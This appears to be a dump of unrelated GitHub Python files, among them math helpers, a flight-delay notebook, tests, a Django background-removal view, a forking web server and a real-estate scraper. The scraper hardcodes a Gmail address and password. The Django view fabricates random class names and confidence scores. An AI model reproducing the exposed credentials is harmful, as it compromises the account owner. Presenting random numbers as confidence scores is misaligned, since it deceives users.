Flop)\n\n\ndef IsPerfect(Integer):\n\treturn (Integer == sum(FactorsOf(Integer)) -Integer)\n\n\ndef IsAbundant(Integer):\n\treturn (sum(FactorsOf(Integer))>2 *Integer)\n\n\ndef IsDeficient(Integer):\n\treturn (sum(FactorsOf(Integer))<2 *Integer)\n\n\ndef isNonRepeating(Integer):\n\tif(Integer %2!=0 and Integer %5!=0):\n\t\treturn False\n\telse:\n\t\tk = Integer\n\t\twhile True:\n\t\t\tif k %5==0:\n\t\t\t\tk = int(k /5)\n\t\t\telse:\n\t\t\t\tbreak\n\t\twhile True:\n\t\t\tif k %2==0:\n\t\t\t\tk = int(k /2)\n\t\t\telse:\n\t\t\t\tbreak\n\t\tif k == 1:\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\tpass\n","repo_name":"mathematicalninja/Euler","sub_path":"MiniFunctions/Python/Integer.py","file_name":"Integer.py","file_ext":"py","file_size_in_byte":6816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"10027052008","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nfrom datetime import timedelta\nfrom itertools import product\nimport datetime\nimport seaborn as sns\nimport random\nimport lightgbm as lgb\nimport re\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import mean_squared_error, f1_score\nget_ipython().run_line_magic('matplotlib', 'notebook')\n\n\ndef display_all(df):\n with pd.option_context(\"display.max_rows\", 1000, \"display.max_columns\", 1000): \n display(df)\n \ndef rmse(y_true, y_pred):\n return np.sqrt(mean_squared_error(y_true, y_pred))\n\ndef evalerror(preds, dtrain):\n labels = dtrain.get_label()\n return 'rmse_', rmse(labels, preds) , False\n\n\nfrom sklearn_pandas import DataFrameMapper\nfrom sklearn.preprocessing import LabelEncoder, Imputer, StandardScaler\nfrom pandas.api.types import is_string_dtype, is_numeric_dtype, is_categorical_dtype\nfrom sklearn.ensemble import forest\nfrom sklearn.tree import export_graphviz\n\n\ndef add_datepart(df, fldname, drop=True, time=False, errors=\"raise\"):\t\n \"\"\"add_datepart converts a column of df from a datetime64 to many columns containing\n the information from the date. This applies changes inplace.\n Parameters:\n -----------\n df: A pandas data frame. df gain several new columns.\n fldname: A string that is the name of the date column you wish to expand.\n If it is not a datetime64 series, it will be converted to one with pd.to_datetime.\n drop: If true then the original date column will be removed.\n time: If true time features: Hour, Minute, Second will be added.\n Examples:\n ---------\n >>> df = pd.DataFrame({ 'A' : pd.to_datetime(['3/11/2000', '3/12/2000', '3/13/2000'], infer_datetime_format=False) })\n >>> df\n A\n 0 2000-03-11\n 1 2000-03-12\n 2 2000-03-13\n >>> add_datepart(df, 'A')\n >>> df\n AYear AMonth AWeek ADay ADayofweek ADayofyear AIs_month_end AIs_month_start AIs_quarter_end AIs_quarter_start AIs_year_end AIs_year_start AElapsed\n 0 2000 3 10 11 5 71 False False False False False False 952732800\n 1 2000 3 10 12 6 72 False False False False False False 952819200\n 2 2000 3 11 13 0 73 False False False False False False 952905600\n \"\"\"\n fld = df[fldname]\n fld_dtype = fld.dtype\n if isinstance(fld_dtype, pd.core.dtypes.dtypes.DatetimeTZDtype):\n fld_dtype = np.datetime64\n\n if not np.issubdtype(fld_dtype, np.datetime64):\n df[fldname] = fld = pd.to_datetime(fld, infer_datetime_format=True, errors=errors)\n targ_pre = re.sub('[Dd]ate$', '', fldname)\n attr = ['Year', 'Month', 'Week', 'Day', 'Dayofweek', 'Dayofyear',\n 'Is_month_end', 'Is_month_start', 'Is_quarter_end', 'Is_quarter_start', 'Is_year_end', 'Is_year_start']\n if time: attr = attr + ['Hour', 'Minute', 'Second']\n for n in attr: df[targ_pre + n] = getattr(fld.dt, n.lower())\n df[targ_pre + 'Elapsed'] = fld.astype(np.int64) // 10 ** 9\n if drop: df.drop(fldname, axis=1, inplace=True)\n\ndef train_cats(df):\n \"\"\"Change any columns of strings in a panda's dataframe to a column of\n categorical values. This applies the changes inplace.\n Parameters:\n -----------\n df: A pandas dataframe. Any columns of strings will be changed to\n categorical values.\n Examples:\n ---------\n >>> df = pd.DataFrame({'col1' : [1, 2, 3], 'col2' : ['a', 'b', 'a']})\n >>> df\n col1 col2\n 0 1 a\n 1 2 b\n 2 3 a\n note the type of col2 is string\n >>> train_cats(df)\n >>> df\n col1 col2\n 0 1 a\n 1 2 b\n 2 3 a\n now the type of col2 is category\n \"\"\"\n for n,c in df.items():\n if is_string_dtype(c): df[n] = c.astype('category').cat.as_ordered()\n\n\n\ndef proc_df(df, y_fld=None, skip_flds=None, ignore_flds=None, do_scale=False, na_dict=None,\n preproc_fn=None, max_n_cat=None, subset=None, mapper=None):\n \"\"\" proc_df takes a data frame df and splits off the response variable, and\n changes the df into an entirely numeric dataframe. For each column of df \n which is not in skip_flds nor in ignore_flds, na values are replaced by the\n median value of the column.\n Parameters:\n -----------\n df: The data frame you wish to process.\n y_fld: The name of the response variable\n skip_flds: A list of fields that dropped from df.\n ignore_flds: A list of fields that are ignored during processing.\n do_scale: Standardizes each column in df. Takes Boolean Values(True,False)\n na_dict: a dictionary of na columns to add. Na columns are also added if there\n are any missing values.\n preproc_fn: A function that gets applied to df.\n max_n_cat: The maximum number of categories to break into dummy values, instead\n of integer codes.\n subset: Takes a random subset of size subset from df.\n mapper: If do_scale is set as True, the mapper variable\n calculates the values used for scaling of variables during training time (mean and standard deviation).\n Returns:\n --------\n [x, y, nas, mapper(optional)]:\n x: x is the transformed version of df. x will not have the response variable\n and is entirely numeric.\n y: y is the response variable\n nas: returns a dictionary of which nas it created, and the associated median.\n mapper: A DataFrameMapper which stores the mean and standard deviation of the corresponding continuous\n variables which is then used for scaling of during test-time.\n Examples:\n ---------\n >>> df = pd.DataFrame({'col1' : [1, 2, 3], 'col2' : ['a', 'b', 'a']})\n >>> df\n col1 col2\n 0 1 a\n 1 2 b\n 2 3 a\n note the type of col2 is string\n >>> train_cats(df)\n >>> df\n col1 col2\n 0 1 a\n 1 2 b\n 2 3 a\n now the type of col2 is category { a : 1, b : 2}\n >>> x, y, nas = proc_df(df, 'col1')\n >>> x\n col2\n 0 1\n 1 2\n 2 1\n >>> data = DataFrame(pet=[\"cat\", \"dog\", \"dog\", \"fish\", \"cat\", \"dog\", \"cat\", \"fish\"],\n children=[4., 6, 3, 3, 2, 3, 5, 4],\n salary=[90, 24, 44, 27, 32, 59, 36, 27])\n >>> mapper = DataFrameMapper([(:pet, LabelBinarizer()),\n ([:children], StandardScaler())])\n >>>round(fit_transform!(mapper, copy(data)), 2)\n 8x4 Array{Float64,2}:\n 1.0 0.0 0.0 0.21\n 0.0 1.0 0.0 1.88\n 0.0 1.0 0.0 -0.63\n 0.0 0.0 1.0 -0.63\n 1.0 0.0 0.0 -1.46\n 0.0 1.0 0.0 -0.63\n 1.0 0.0 0.0 1.04\n 0.0 0.0 1.0 0.21\n \"\"\"\n if not ignore_flds: ignore_flds=[]\n if not skip_flds: skip_flds=[]\n if subset: df = get_sample(df,subset)\n else: df = df.copy()\n ignored_flds = df.loc[:, ignore_flds]\n df.drop(ignore_flds, axis=1, inplace=True)\n if preproc_fn: preproc_fn(df)\n if y_fld is None: y = None\n else:\n if not is_numeric_dtype(df[y_fld]): df[y_fld] = pd.Categorical(df[y_fld]).codes\n y = df[y_fld].values\n skip_flds += [y_fld]\n df.drop(skip_flds, axis=1, inplace=True)\n\n if na_dict is None: na_dict = {}\n else: na_dict = na_dict.copy()\n na_dict_initial = na_dict.copy()\n for n,c in df.items(): na_dict = fix_missing(df, c, n, na_dict)\n if len(na_dict_initial.keys()) > 0:\n df.drop([a + '_na' for a in list(set(na_dict.keys()) - set(na_dict_initial.keys()))], axis=1, inplace=True)\n if do_scale: mapper = scale_vars(df, mapper)\n for n,c in df.items(): numericalize(df, c, n, max_n_cat)\n df = pd.get_dummies(df, dummy_na=True)\n df = pd.concat([ignored_flds, df], axis=1)\n res = [df, y, na_dict]\n if do_scale: res = res + [mapper]\n return res\n\n\n\n\n# 3. Feature Engineering\n\n# 3-1. Adding Datetime Features\n\njj['time'] = pd.to_datetime(jj['time'])\n\n\njj['scheduled_dep'] = jj['scheduled_dep'].apply(lambda x: int(str(x).split(':')[0])*60 + int(str(x).split(':')[1]))\n\n\nadd_datepart(jj, 'date', drop=False)\njj[['Is_month_end','Is_month_start','Is_quarter_end','Is_quarter_sta60rt']] = jj[['Is_month_end','Is_month_start','Is_quarter_end','Is_quarter_start']].astype(np.int8)\n\n\n# 3-2. Adding weather'_bet' Features\n\n# Adding the mean values of weather columns of departure city and destination city as new features\n\nhourly_wea_cols = [c[:-4] for c in list(jj) if 'des' in c]\n\n\nfor col in hourly_wea_cols:\n jj[col + '_bet'] = (jj[col + '_dep'] + jj[col + '_des']) / 2\n\n\n# 3-3. Setting Target\n\n# I set target = 1 for observations that meet these criteria.\n# 1. Delayed for more than an hour\n# 2. Delayed for specific weather reasons (need to be updated)\n\ndf = jj.copy()\n\n\nweather_reason = ['기상', '기상-기타', '기상-뇌전', '기상-눈', '기상-바람', '기상-비',\n '기상-시정', '기상-운고', '기상-태풍', '기상-항로', '제방빙작업']\n\ndf['target'] = 0\ndf.loc[(df['delay_time'] > 60)&(df['reason'].isin(weather_reason)), 'target'] = 1\n\n\ndf['target'].value_counts()\n\n\nf.drop(['dep_loc', 'real_dep', 'status', 'reason', 'type'], 1, inplace=True)\n\n\n# 3-4. Feature Correlation\n\ncorr_matrix = df.corr().abs()\n\n\ncorr_df = corr_matrix.unstack().sort_values(kind='quicksort').reset_index()\ncorr_df = corr_df[corr_df['level_0'] != corr_df['level_1']].dropna()\n\n\ncorr_df.sort_values(by=0, ascending=False).drop_duplicates(subset=[0]).head(10)\n\n\n# Select upper triangle of correlation matrix\nupper = corr_matrix.where(np.triu(np.ones(corr_matrix.shape), k = 1).astype(np.bool))\n\n# Find index of feature columns with correlation greater than 0.95\nto_drop = [col for col in upper.columns if any(upper[col] > 0.95)]\n\n# Drop features\ndf.drop(to_drop, axis = 1, inplace=True)\n\n\n# 4. Encoding\n\ntrain_cats(df)\n\n\n# 5. Downsampling\n\n# - The number of observations that target = 1 is too small. Hence, I decided to use upsampling.\n\nind = df[df['target']==0].index\ndownsamp_ind = random.sample([x for x in ind], int(1.5 * len(df[df['target']==1])) )\n\nvalid_ind = [x for x in df[df['target']==1].index]\n\n\nfor x in valid_ind:\n downsamp_ind.append(x)\n\n\ndf = df.loc[downsamp_ind]\ndf = df.sort_values(by=['date', 'scheduled_dep'])\n\n\ndf.loc[df['phenomena_dep'].isnull(), 'phenomena_dep'] = 100\ndf.loc[df['phenomena_des'].isnull(), 'phenomena_des'] = 100\n\n\n\n","repo_name":"yijaeseung/Flight-Delay-Prediction","sub_path":"code/03_FE_Encoding_Downsampling.py","file_name":"03_FE_Encoding_Downsampling.py","file_ext":"py","file_size_in_byte":10521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"37107440644","text":"def transform_string(number: int) -> str:\n \"\"\"Возвращает строку вида 'N процентов' с учётом склонения по указанному number\"\"\"\n # место для Вашего кода\n a = (\"Процент\")\n b = (\"Процента\")\n c = (\"Процентов\")\n i = input(\"Введите сколько у вас процентов: \")\n numbs = {11, 12, 13, 14}\n for i in range(100):\n i = i + 1\n if i in numbs:\n print(i, c)\n elif i % 10 == 1:\n print(i, a)\n elif i % 10 > 1 and i % 10 < 5:\n print(i, b)\n else:\n print(i, c)\n return 'верните отформатированную строку'\n\n\nfor n in range(1, 100): # по заданию учитываем только значения от 1 до 100\n print(transform_string(n))","repo_name":"PostmanFPS/repo-github","sub_path":"Iliin_Matthew_dz_1/Iliin_Matthew_dz_1_3.py","file_name":"Iliin_Matthew_dz_1_3.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"5152282359","text":"from typing import List, Any\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nimport random\n# The first step is always the same: import all necessary components:\nimport smtplib\nfrom email.mime.text import MIMEText\nimport time\n\nfrom socket import gaierror\n\n# version = 1.1.0.0\n\n# log version 1.1.0.0\n# added multiple pages\n\nsleepTime = 600 # [s]\ncntChecker = 0\nNUM_CHECKER = 5 # num iteration before control email is sent\n\n# debug mode\nDEBUG_MODE = 0 # enable the prints and add extra item to the offer list\n\n# fileName\nfileName = 'offers.log'\n\n# maximum number of pages\nMAX_NUM_PAGES = 5\n\nurl = \"https://www.sreality.cz/hledani/prodej/byty/praha-7?velikost=2%2Bkk,2%2B1,1%2B1,3%2Bkk&cena-od=0&cena-do=7000000&bez-aukce=1\"\n\nwhile True:\n\n cntChecker = cntChecker + 1\n time.sleep(sleepTime)\n localtime = time.localtime()\n result = time.strftime(\"%I:%M:%S %p\", localtime)\n print(result)\n\n # get information from sreality\n #driver = webdriver.Safari() # TODO support only Safari browser\n #driver = webdriver.Firefox()\n #driver = webdriver.Chrome(\"/usr/local/bin/chromedriver\")\n #driver = webdriver.Chrome('./chromedriver') # Optional argument, if not specified will search path.\n\n for cntPage in range(MAX_NUM_PAGES):\n # get information from sreality\n driver = webdriver.Safari() # TODO support only Safari browser\n if cntPage == 0:\n # driver.get(\"https://www.sreality.cz/hledani/prodej/byty/brno?stari=mesic\")\n driver.get(url)\n soup = BeautifulSoup(driver.page_source, \"html.parser\")\n else:\n url = url + \"&strana=\" + str(cntPage)\n driver.get(url)\n soup = BeautifulSoup(driver.page_source, \"html.parser\")\n driver.quit()\n\n listCurrentOffers = [] # list of current offers\n numCurrentOffers = 0 #\n for title in soup.select(\".text-wrap\"):\n numCurrentOffers = numCurrentOffers + 1\n num = \"https://www.sreality.cz\" + title.select_one(\".title\").get('href')\n listCurrentOffers.append(num)\n\n # load data from a log\n with open(fileName) as f: # TODO issue once the file doesn't exist\n listLoggedData = f.read().splitlines()\n\n # compare log against current loaded data\n listNewOffers = [] # offers which are not in the offers.log\n for currentItem in listCurrentOffers:\n isInTheList = 0 # set the flag to 0 as default value\n for loggedItem in listLoggedData:\n # compare strings\n isEqual = currentItem == loggedItem\n if isEqual:\n isInTheList = 1 # if the item is in the list\n\n if not isInTheList:\n listNewOffers.append(currentItem)\n\n # update log\n if listNewOffers:\n print('New offer(s) found')\n\n # save new offers to the log file\n f = open(fileName, 'a')\n f.write('\\n')\n s1 = '\\n'.join(listNewOffers)\n f.write(s1)\n f.close()\n\n # send an email\n # creates SMTP session\n s = smtplib.SMTP('smtp.gmail.com:587')\n s.ehlo()\n\n # start TLS for security\n s.starttls()\n # Authentication\n s.login(\"mmachecker@gmail.com\", \"klokanBarezi\")\n # message to be sent\n outS = '\\n'.join(listNewOffers)\n msg = MIMEText(outS)\n msg['Subject'] = 'Nove reality'\n msg['From'] = 'mmaChecker@gmail.com'\n msg['To'] = 'michalmandlik@gmail.com'\n # sending the mail\n s.sendmail(\"mmachecker@gmail.com\", \"michalmandlik@gmail.com\", msg.as_string(msg))\n # terminating the session\n s.quit()\n print('Email with offers sent')\n\n if cntChecker == NUM_CHECKER:\n cntChecker = 0\n # creates SMTP session\n s = smtplib.SMTP('smtp.gmail.com:587')\n s.ehlo()\n\n # start TLS for security\n s.starttls()\n\n # Authentication\n s.login(\"mmachecker@gmail.com\", \"klokanBarezi\")\n\n # message to be sent\n outS = 'Safari checker is running'\n msg = MIMEText(outS)\n msg['Subject'] = 'Safari checker is running'\n msg['From'] = 'mmaChecker@gmail.com'\n msg['To'] = 'michalmandlik@gmail.com'\n\n # sending the mail\n s.sendmail(\"mmachecker@gmail.com\", \"michalmandlik@gmail.com\", msg.as_string(msg))\n\n # terminating the session\n s.quit()","repo_name":"michalmandlik/readWeb","sub_path":"readWeb.py","file_name":"readWeb.py","file_ext":"py","file_size_in_byte":4418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"21658905226","text":"\nclass Assignment:\n lower = 0\n upper = 0\n\n def read(self, pair):\n self.lower = int(pair.split('-')[0])\n self.upper = int(pair.split('-')[1])\n # print(str(self.lower)+\" \"+str(self.upper))\n\n\nclass Elves:\n assi1 = Assignment()\n assi2 = Assignment()\n counter_inside = 0\n counter_overlap = 0\n\n def read(self, line):\n line = line.strip()\n text = line.split(',')\n print(text)\n self.assi1.read(text[0])\n self.assi2.read(text[1])\n\n def check_if_inside(self, ass):\n if ass[0].lower <= ass[1].lower:\n if ass[0].upper >= ass[1].upper:\n return True\n\n def check_if_inside_2way(self):\n if self.check_if_inside([self.assi1, self.assi2]):\n # print(\"2 in 1\")\n self.counter_inside += 1\n return True\n elif self.check_if_inside([self.assi2, self.assi1]):\n # print(\"1 in 2\")\n self.counter_inside += 1\n return True\n return False\n\n def check_overlap(self):\n if self.assi1.lower <= self.assi2.upper:\n if self.assi1.upper >= self.assi2.lower:\n print(\"Overlap\")\n self.counter_overlap += 1\n return True\n\n\ndef task1():\n elves = Elves()\n for line in Lines:\n elves.read(line)\n elves.check_if_inside_2way()\n elves.check_overlap()\n\n print('Task 1: ' + str(elves.counter_inside))\n print('Task 2: ' + str(elves.counter_overlap))\n\n\nif __name__ == '__main__':\n file = open('input.txt', 'r')\n Lines = file.readlines()\n\n task1()\n","repo_name":"floonym/adventofcode","sub_path":"04/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"72990060372","text":"import pytest\nimport day07 as lib\n\n\n@pytest.fixture\ndef example_listing() -> str:\n return \"\"\"- / (dir)\n - a (dir)\n - e (dir)\n - i (file, size=584)\n - f (file, size=29116)\n - g (file, size=2557)\n - h.lst (file, size=62596)\n - b.txt (file, size=14848514)\n - c.dat (file, size=8504156)\n - d (dir)\n - j (file, size=4060174)\n - d.log (file, size=8033020)\n - d.ext (file, size=5626152)\n - k (file, size=7214296)\"\"\"\n\n\n@pytest.fixture\ndef example_shell_output() -> str:\n return \"\"\"$ cd /\n$ ls\ndir a\n14848514 b.txt\n8504156 c.dat\ndir d\n$ cd a\n$ ls\ndir e\n29116 f\n2557 g\n62596 h.lst\n$ cd e\n$ ls\n584 i\n$ cd ..\n$ cd ..\n$ cd d\n$ ls\n4060174 j\n8033020 d.log\n5626152 d.ext\n7214296 k\n\"\"\"\n\n\n@pytest.fixture\ndef basic_file_system() -> lib.Directory:\n root = lib.Directory(\"/\")\n file_1 = lib.File(\"a.txt\", 500, parent=root)\n dir_1 = lib.Directory(\"my_dir\", parent=root)\n file_2 = lib.File(\"b.txt\", 800, parent=dir_1)\n return root\n\n\ndef test_filestystem_creation(basic_file_system: lib.Directory):\n assert len(basic_file_system._contents) == 2\n\n\ndef test_directory_size(basic_file_system: lib.Directory):\n assert basic_file_system.size == 1300\n\n\n@pytest.fixture\ndef example_file_system(example_listing: str):\n directory = lib.parse_listing(example_listing)\n assert directory.name == \"/\"\n assert directory.size == 48381165\n return directory\n\n\ndef test_walk(basic_file_system):\n assert len([*lib.walk(basic_file_system)]) == 4\n\n\ndef test_walk_and_get_root(example_file_system: lib.Directory):\n for node in lib.walk(example_file_system):\n assert example_file_system == node.get_root()\n\n\ndef test_get_sizes_example(example_listing: str):\n filesystem = lib.parse_listing(example_listing)\n assert sum(lib.get_directory_sizes(filesystem)) == 95437\n\n\ndef test_import_shell(example_shell_output: str, example_file_system: lib.Directory):\n shell_dir = lib.read_shell_history(example_shell_output)\n for node_1, node_2 in zip(lib.walk(shell_dir), lib.walk(example_file_system)):\n assert node_1.name == node_2.name\n\n\ndef test_example_2(example_file_system):\n assert lib.part_2(example_file_system) == 24933642\n","repo_name":"brmdv/aoc_2022","sub_path":"day07/test_day07.py","file_name":"test_day07.py","file_ext":"py","file_size_in_byte":2181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"44844058332","text":"from chirp import settings\nfrom tests import base\n\n\nclass TestCaseSettings(base.DriverTest):\n def test_has_settings(self):\n return\n settings = self.radio.get_settings()\n if settings:\n self.assertFalse(self.rf.has_settings,\n 'Radio returned settings but has_settings=False')\n else:\n self.assertTrue(self.rf.has_settings,\n 'Radio returned no settings but has_settings=True')\n\n @base.requires_feature('has_settings')\n def test_get_settings(self):\n lst = self.radio.get_settings()\n self.assertIsInstance(lst, list)\n\n @base.requires_feature('has_settings')\n def test_same_settings(self):\n o = self.radio.get_settings()\n self.radio.set_settings(o)\n n = self.radio.get_settings()\n list(map(self.compare_settings, o, n))\n\n def compare_settings(self, a, b):\n try:\n if isinstance(a, settings.RadioSettingValue):\n raise StopIteration\n list(map(self.compare_settings, a, b))\n except StopIteration:\n self.assertEqual(a.get_value(), b.get_value(),\n 'Setting value changed from %r to %r' % (\n a.get_value(), b.get_value()))\n","repo_name":"bsefting/chirp-mygmrs","sub_path":"tests/test_settings.py","file_name":"test_settings.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"18522236027","text":"from django.http import JsonResponse\r\nfrom .forms import ImageUploadForm\r\nimport rembg\r\nimport base64\r\nfrom PIL import Image, ImageOps\r\nimport io\r\nimport numpy as np\r\nimport random # ランダムな値を生成するためのモジュール\r\nfrom django.shortcuts import render\r\n\r\ndef remove_background(request):\r\n if request.method == 'POST':\r\n form = ImageUploadForm(request.POST, request.FILES)\r\n if form.is_valid():\r\n # フォームから画像を取得\r\n image_data = form.cleaned_data['image'].file.read()\r\n\r\n # 画像処理と背景除去\r\n processed_image = process_image(image_data)\r\n output_image = rembg.remove(processed_image)\r\n\r\n # ランダムなクラス名と信頼度スコアを生成\r\n class_name = f\"Class_{random.randint(1, 100)}\"\r\n confidence_score = random.uniform(0.5, 0.95)\r\n\r\n # レスポンスを返す\r\n return JsonResponse({\r\n 'processed_image': base64.b64encode(processed_image).decode(\"utf-8\"),\r\n 'output_image': base64.b64encode(output_image).decode(\"utf-8\"),\r\n 'class_name': class_name,\r\n 'confidence_score': confidence_score\r\n })\r\n # フォームが無効な場合の処理\r\n # エラーメッセージを返すか、フォームエラーの詳細を返すなどの対応が必要です\r\n else:\r\n # GETリクエストに対する処理\r\n form = ImageUploadForm()\r\n context = {'form': form}\r\n return render(request, 'remove_background.html', context)\r\n\r\n# process_image関数はそのままにしておきます\r\ndef process_image(image_data):\r\n image = Image.open(io.BytesIO(image_data))\r\n max_size = max(image.size)\r\n new_image = image.crop((0, 0, max_size, max_size))\r\n output_image = io.BytesIO()\r\n new_image.save(output_image, format='PNG')\r\n processed_image = output_image.getvalue()\r\n return processed_image\r\n","repo_name":"dedenion/virtual_fitting","sub_path":"removal_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2014,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"19316969704","text":"\"\"\"\n Same as webserver3b but in this one the parent and child processes close duplicate descriptors\n\"\"\"\n\nimport socket\nimport time\nimport os\n\nSERVER_ADDRESS = (HOST, PORT) = '', 1028\nREQUEST_QUEUE_SIZE = 5\n\ndef handle_request(client_connection):\n request = client_connection.recv(1024)\n print(\n 'Child PID: {pid}. Parent PID {ppid}'.format(\n pid = os.getpid(),\n ppid = os.getppid(),\n )\n )\n print(request.decode())\n http_response = b\"\"\"\\\nHTTP/1.1 200 OK\n\nHello, World!\n\"\"\"\n client_connection.sendall(http_response)\n time.sleep(60) # sleep and block the process for 60 seconds\n\ndef serve_forever():\n listen_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n listen_socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR, 1)\n listen_socket.bind(SERVER_ADDRESS)\n listen_socket.listen(REQUEST_QUEUE_SIZE)\n print('Serving HTTP on port {port} ...'.format(port= PORT))\n print('Parent PID (PPID): {pid}'.format(pid = os.getpid()))\n\n while True:\n client_connection, client_address = listen_socket.accept()\n pid = os.fork()\n if pid == 0: #child\n listen_socket.close() #child copy\n handle_request(client_connection)\n client_connection.close()\n os._exit(0) #child exists here\n else: #Parent\n client_connection.close() #parent copy and loop \nif __name__ == '__main__':\n serve_forever()\n","repo_name":"bowe99/HTTP-Server","sub_path":"webserver3c.py","file_name":"webserver3c.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"6352520153","text":"from tkinter import *\n\napp = Tk()\napp.title('CheckBox')\nch = StringVar()\nchk = Checkbutton(app, text='CheckBox', variable=ch, onvalue='Yes', offvalue='Nope')\nchk.deselect()\nchk.pack()\n\n\ndef show():\n msg = Label(app, text=ch.get())\n msg.pack()\n\n\nb = Button(app, command=show, text='Show')\nb.pack()\napp.mainloop()\n","repo_name":"Abdulla-Khan/Python-Tkinter-Basics","sub_path":"check.py","file_name":"check.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"38102447438","text":"\"\"\"\n2个解\n\"\"\"\nclass Solution:\n def lengthOfLastWord(self, s: str) -> int:\n # solution1:\n #return len(s.strip().split(\" \")[-1])\n\n # solution2:\n i = len(s) - 1\n while s[i] == \" \" and i >= 0:\n i -= 1\n j = i\n while s[j] != \" \" and j >= 0:\n j -= 1\n return i - j\n\n\nsol = Solution()\ns = \"Hello World\"\nprint(sol.lengthOfLastWord(s))","repo_name":"lionelstellar/leetcode","sub_path":"058.Length of Last Word/solution1.py","file_name":"solution1.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"30443339629","text":"import os\nfrom hashlib import sha256\n\nfrom sqlalchemy import Column, Integer, String\n\nfrom inbox.config import config\nfrom inbox.log import get_logger\nlog = get_logger()\n\n# TODO: store AWS credentials in a better way.\nSTORE_MSG_ON_S3 = config.get('STORE_MESSAGES_ON_S3', None)\n\nif STORE_MSG_ON_S3:\n from boto.s3.connection import S3Connection\n from boto.s3.key import Key\nelse:\n from inbox.util.file import mkdirp\n\n _data_file_directory = \\\n lambda h: os.path.join(config.get_required('MSG_PARTS_DIRECTORY'),\n h[0], h[1], h[2], h[3], h[4], h[5])\n\n _data_file_path = lambda h: os.path.join(_data_file_directory(h), h)\n\n\nclass Blob(object):\n \"\"\" A blob of data that can be saved to local or remote (S3) disk. \"\"\"\n\n size = Column(Integer, default=0)\n data_sha256 = Column(String(64))\n\n @property\n def data(self):\n if self.size == 0:\n log.warning('Block size is 0')\n # Placeholder for \"empty bytes\". If this doesn't work as intended,\n # it will trigger the hash assertion later.\n value = \"\"\n elif hasattr(self, '_data'):\n # On initial download we temporarily store data in memory\n value = self._data\n elif STORE_MSG_ON_S3:\n value = self._get_from_s3()\n else:\n value = self._get_from_disk()\n\n if value is None:\n log.error('No data returned!')\n return value\n\n assert self.data_sha256 == sha256(value).hexdigest(), \\\n \"Returned data doesn't match stored hash!\"\n return value\n\n @data.setter\n def data(self, value):\n assert value is not None, \\\n \"Blob can't have NoneType data (can be zero-length, though!)\"\n assert type(value) is not unicode, 'Blob bytes must be encoded'\n\n # Cache value in memory. Otherwise message-parsing incurs a disk or S3\n # roundtrip.\n self._data = value\n self.size = len(value)\n self.data_sha256 = sha256(value).hexdigest()\n assert self.data_sha256\n\n if self.size > 0:\n if STORE_MSG_ON_S3:\n self._save_to_s3(value)\n else:\n self._save_to_disk(value)\n else:\n log.warning('Not saving 0-length {1} {0}'.format(\n self.id, self.__class__.__name__))\n\n def _save_to_s3(self, data):\n assert 'AWS_ACCESS_KEY_ID' in config, 'Need AWS key!'\n assert 'AWS_SECRET_ACCESS_KEY' in config, 'Need AWS secret!'\n assert 'MESSAGE_STORE_BUCKET_NAME' in config, \\\n 'Need bucket name to store message data!'\n\n # Boto pools connections at the class level\n conn = S3Connection(config.get('AWS_ACCESS_KEY_ID'),\n config.get('AWS_SECRET_ACCESS_KEY'))\n bucket = conn.get_bucket(config.get('MESSAGE_STORE_BUCKET_NAME'),\n validate=False)\n\n # See if it already exists; if so, don't recreate.\n key = bucket.get_key(self.data_sha256)\n if key:\n return\n\n key = Key(bucket)\n key.key = self.data_sha256\n key.set_contents_from_string(data)\n\n def _get_from_s3(self):\n if not self.data_sha256:\n return None\n\n conn = S3Connection(config.get('AWS_ACCESS_KEY_ID'),\n config.get('AWS_SECRET_ACCESS_KEY'))\n bucket = conn.get_bucket(config.get('MESSAGE_STORE_BUCKET_NAME'),\n validate=False)\n\n key = bucket.get_key(self.data_sha256)\n\n if not key:\n log.error('No key with name: {} returned!'.\n format(self.data_sha256))\n return\n\n return key.get_contents_as_string()\n\n def _save_to_disk(self, data):\n directory = _data_file_directory(self.data_sha256)\n mkdirp(directory)\n\n with open(_data_file_path(self.data_sha256), 'wb') as f:\n f.write(data)\n\n def _get_from_disk(self):\n if not self.data_sha256:\n return None\n\n try:\n with open(_data_file_path(self.data_sha256), 'rb') as f:\n return f.read()\n except IOError:\n log.error('No file with name: {}!'.format(self.data_sha256))\n return\n","repo_name":"PriviPK/privipk-sync-engine","sub_path":"inbox/models/roles.py","file_name":"roles.py","file_ext":"py","file_size_in_byte":4291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"41391919395","text":"\"\"\" Main module containing the API \"\"\"\n\nimport msgpack\nimport socket\nimport ipaddress\nimport threading\nimport time\n\nfrom .bucketset import BucketSet\nfrom .hashing import hash_function, rpc_id_pair, random_id\nfrom .peer import Peer\nfrom .shortlist import Shortlist\nfrom .helper import sixunicode, LockedDict\nfrom .server import DHTServer, 